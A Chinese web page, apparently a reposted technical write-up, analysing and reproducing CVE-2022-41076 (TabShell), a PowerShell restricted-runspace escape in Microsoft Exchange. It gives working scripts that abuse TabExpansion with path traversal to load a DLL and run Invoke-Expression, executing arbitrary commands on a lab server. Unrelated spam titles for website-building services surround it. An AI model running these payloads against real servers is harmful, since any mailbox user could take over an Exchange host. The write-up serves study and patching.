当前位置: 首页 > news >正文

浙江电商网站建设销售做游戏交易网站有哪些内容

浙江电商网站建设销售,做游戏交易网站有哪些内容,重庆h5建站,wordpress 压缩gif插件漏洞概述PowerShell#xff08;包括Windows PowerShell和PowerShell Core#xff09;是微软公司开发的任务自动化和配置管理程序#xff0c;最初只是一个 Windows 组件#xff0c;由命令行 shell 和相关的脚本语言组成。后于2016年8月18日开源并提供跨平台支持。PowerShell…漏洞概述PowerShell包括Windows PowerShell和PowerShell Core是微软公司开发的任务自动化和配置管理程序最初只是一个 Windows 组件由命令行 shell 和相关的脚本语言组成。后于2016年8月18日开源并提供跨平台支持。PowerShell 命令称为 cmdlet读作 command-let可以用.NET 语言或 PowerShell 脚本语言本身来编写。PowerShell提供了运行空间功能允许应用程序自定义运行空间以限制可执行的自定义cmdlet。但在其会话中额外提供了可使用TabExpansion cmdlet结合目录穿越可实现加载任意dll执行导致攻击者可以执行原本不能执行的cmdlet从而在目标机器上执行任意代码。使用了PowerShell自定义运行空间的程序受此漏洞影响。比如Microsoft Exchange邮件服务程序通过此功能提供了远程PowerShell以便远程管理Exchange邮件服务器该远程PowerShell限制了危险的cmdlet和命令的执行。但是经过身份验证的远程攻击者可以在此远程PowerShell会话中利用该漏洞在目标机器上执行任意代码。影响范围主流Windows操作系统版本较多可参考文末参考链接、PowerShell 7.2和7.3复现环境服务器操作系统Microsoft Windows Server 2012 R2 Standard 64位操作系统服务器IP192.168.220.162攻击机操作系统Win10 64位操作系统Microsoft Exchange邮件服务程序版本2016分析工具dnspy、procexp漏洞分析首先安装Microsoft Exchange Server 2016程序需要先安装域再安装Exchange内存最好8G以上以免出现各种异常具体方法可参考文末参考链接安装好后浏览器访问https://192.168.220.162/ecp使用域管理员账号登录Exchange管理中心添加测试账号。分析时使用的测试账号是新建的域普通用户账号账号名cve-user密码为4rfv5tgb.以“现有用户”的方式新建用户邮箱如下图所示在攻击机可以不加入域但要保证能通过域名访问到Exchange服务器上打开powershell控制台使用测试账号登录Exchange提供的远程PowerShell登录脚本如下1$User BeaconTowerLab\cve-user$Pass ConvertTo-SecureString -AsPlainText 4rfv5tgb. -Force$Credential New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Pass$Session New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri http://WIN-EN5J2DQFIF3.BeaconTowerLab.local/powershell/ -Authentication Kerberos -Credential $CredentialImport-PSSession $Session -AllowClobber其中$User是新建的普通域用户账号$Pass中的字符串“4rfv5tgb.”是域用户密码$Session中的URI“http://WIN-EN5J2DQFIF3.BeaconTowerLab.local/powershell/”是Exchange提供的远程PowerShell访问链接请注意这里是HTTP协议域名是Exchange服务器的域名。登录成功后就可以执行Exchange提供的PowerShell cmdlet管理邮件服务器。比如执行 Get-Mailbox cmdlet可以查看邮箱对象和属性脚本如下1Invoke-Command -Session $Session -ScriptBlock {get-mailbox}尝试执行其他cmdlet比如“get-process”试图获取Exchange服务器的进程列表执行结果如下图所示可以看到get-process cmdlet不能被执行。说明Exchange提供的远程PowerShell限制了cmdlet并不能执行任意cmdlet。被允许执行的cmdlet可以通过get-command来获取执行结果如下图所示这种受限制的PowerShell是由运行空间Runspace 技术实现的。使用dnspy反编译Exchange文件Microsoft.Exchange.PowerSharp.Management.dll在类ExchangeManagementSessionFactory中可以找到注册cmdlet代码实现的细节如下图所示在Exchange服务器上有多个w3wp.exe进程分别处理不同的WEB请求。负责Exchange远程PowerShell登录、cmdlet执行的进程命令行参数中包含“MSExchangePowerShellAppPool”字符串如下图所示使用dnspy调试器附加上该进程反编译系统模块System.Management.Automation.dll在登录Exchange PowerShell时将调用该文件包含的System.Management.Automation.Remoting.ServerRemoteSession类中的HandleCreateRunspacePool()函数。当传递参数WSManStackVersion 3.0时将注册额外的TabExpansion cmdlet提供cmdlet补全功能如下图所示然后在登录成功后可以执行TabExpansion cmdlet补全“test”cmdlet的脚本如下1Invoke-Command -Session $Session -ScriptBlock {TabExpansion -line test -lastWord test}在TabExpansion的实现代码中使用“|;”字符分割传入的参数然后执行Get-Command cmdlet如下图所示此时Get-Command cmdlet在执行的时候将执行系统模块System.Management.Automation.dll的System.Management.Automation.CommandDiscovery类中的LookupCommandInfo()函数如下图所示其中调用函数TryModuleAutoLoading()其下再调用函数AutoloadSpecifiedModule()最终执行Import-Module cmdlet加载对应的模块如下图所示比如执行如下脚本可以实现加载NetTCPIP模块。1Invoke-Command -Session $Session -ScriptBlock { TabExpansion -line ;NetTCPIP\Test-NetConnection -lastWord -test }这样相当于执行cmdletImport-Module -Name NetTCPIP如下图所示Import-Module导入的模块文件可以是模块文件.psd1、PowerShell脚本文件.ps1和托管模块文件.dll。这样一来配合路径穿越可以实现加载PowerShell模块文件Microsoft.PowerShell.Commands.Utility.dll。脚本如下1Invoke-Command -Session $Session -ScriptBlock { TabExpansion -line ;../../../../Windows/Microsoft.NET/assembly/GAC_MSIL/Microsoft.PowerShell.Commands.Utility/v4.0_3.0.0.0__31bf3856ad364e35/Microsoft.PowerShell.Commands.Utility.dll\Invoke-Expression -lastWord -test }PowerShell模块加载成功后执行Invoke-Expression cmdlet可实现执行任意命令突破了原来使用运行空间Runspace 创建的PowerShell cmdlet限制。比如获取当前用户名的脚本如下1Invoke-Command $session {Microsoft.PowerShell.Commands.Utility\Invoke-Expression [System.Security.Principal.WindowsIdentity]::GetCurrent().Name }利用场景从漏洞分析结果可知使用了PowerShell自定义运行空间的程序受此漏洞影响可实现任意代码执行。根据网络上公开的消息Exchange和Skype Business使用了该技术可以利用该漏洞实现远程代码执行接管服务器。针对Exchange程序需要以下信息才能利用该漏洞1. 一个能成功登录的邮箱账号和密码2. 远程PowerShell管理中心可通过账号密码访问3. 操作系统版本或者PowerShell版本在漏洞范围内漏洞复现漏洞分析中已经包含了Exchange的安装说明和注意事项不再赘述。根据网上已公开的漏洞利用代码这里再做归纳和说明。利用漏洞获取当前用户名的脚本如下1$secureString ConvertTo-SecureString -String 4rfv5tgb. -AsPlainText -Force$UserCredential New-Object System.Management.Automation.PSCredential -ArgumentList BeaconTowerLab\cve-user, $secureString$version New-Object -TypeName System.Version -ArgumentList 2.0$mytable $PSversionTable$mytable[WSManStackVersion] $version$sessionOption New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck -ApplicationArguments {PSversionTable$mytable}$Session New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri http://WIN-EN5J2DQFIF3.BeaconTowerLab.local/powershell -Credential $UserCredential -Authentication Kerberos -AllowRedirection -SessionOption $sessionOptionInvoke-Command -Session $Session -ScriptBlock { TabExpansion -line ;../../../../Windows/Microsoft.NET/assembly/GAC_MSIL/Microsoft.PowerShell.Commands.Utility/v4.0_3.0.0.0__31bf3856ad364e35/Microsoft.PowerShell.Commands.Utility.dll\Invoke-Expression -lastWord -test }Invoke-Command $session {Microsoft.PowerShell.Commands.Utility\Invoke-Expression [System.Security.Principal.WindowsIdentity]::GetCurrent().Name }其中“cve-user”是新建的普通域用户账号“4rfv5tgb.”是域用户密码同样也是Exchange的账号和密码“http://WIN-EN5J2DQFIF3.BeaconTowerLab.local/powershell/”是Exchange提供的远程PowerShell访问链接请注意这里是HTTP协议域名是Exchange服务器的域名。执行任意命令比如执行计算器程序calc.exe脚本如下1Invoke-Command $session {Microsoft.PowerShell.Commands.Utility\Invoke-Expression [Diagnostics.Process]::Start(calc.exe) }进入交互式PowerShell执行任意命令比如执行ipconfig.exe /all脚本如下1Enter-PSSession -Session $Sessioninvoke-expression $ExecutionContext.SessionState.LanguageModeinvoke-expression $ExecutionContext.SessionState.LanguageModeFullLanguage$ps new-object System.Diagnostics.Process$ps.StartInfo.Filename ipconfig.exe$ps.StartInfo.Arguments /all$ps.StartInfo.RedirectStandardOutput $True$ps.StartInfo.UseShellExecute $false$ps.start()$ps.WaitForExit()[string] $Out $ps.StandardOutput.ReadToEnd();$Out补丁链接https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41076BootstrapClassLoader参考链接https://zh.wikipedia.org/zh-hans/PowerShellhttps://blog.viettelcybersecurity.com/tabshell-owassrf/https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41076https://blog.csdn.net/qq_44159028/article/details/123814873https://github.com/balki97/OWASSRF-CVE-2022-41082-POC/blob/main/TabShell.ps1原文链接
http://www.w-s-a.com/news/606565/

相关文章:

  • 中国十大网站开发公司企业网站建设的要素有哪些
  • 网站防站做网站吉林
  • 嘉定区网站建设公司企业信息公示查询系统官网
  • 一个具体网站的seo优化产品介绍网站模板下载地址
  • 怎么做网站在网上能搜到你哈尔滨网站建立公司
  • 做家旅游的视频网站上海百度公司总部
  • 微信小程序公司网站怎么制作区块链平台定制开发
  • 网站资质优化ip地址域名解析
  • 如何搭建个人网站ps做网站首页怎么运用起来
  • 中小企业商务网站建设wordpress 安全加固
  • asp网站开发设计文档php建设网站怎么用
  • 服装公司网站建设需求分析报告seo搜索引擎优化实战
  • wordpress 扒站最近最新新闻
  • 手机wap网站开发与设计wordpress域名无法访问
  • 百度收录网站收费吗做网站用vs还是dw
  • 维度网络专业做网站嘉兴网站建设方案服务
  • 成品电影网站建设中国最顶尖设计师
  • 网站建设报价清单明细视频网站如何做营销
  • 建设农业网站的论文做国外网站有哪些
  • 怎么做网页 网站制作张家港网站制作哪家好
  • 创世网站建设公司书籍封面设计网站
  • 国外优秀网站设计欣赏小程序推广赚佣金
  • 徐州人才网官方网站邯郸seo优化公司
  • 海南响应式网站建设哪里好瑞安电影城网站建设
  • wordpress widgetkit济南优化网站厂家
  • 麦片网站建设佛山短视频推广渠道
  • 免费自助建网站销售的网络建设
  • 传媒大气的网站网站怎么做分类聚合
  • 网站可以自己备案吗crm系统架构图
  • 罗湖网站建设58做网站的公司盐城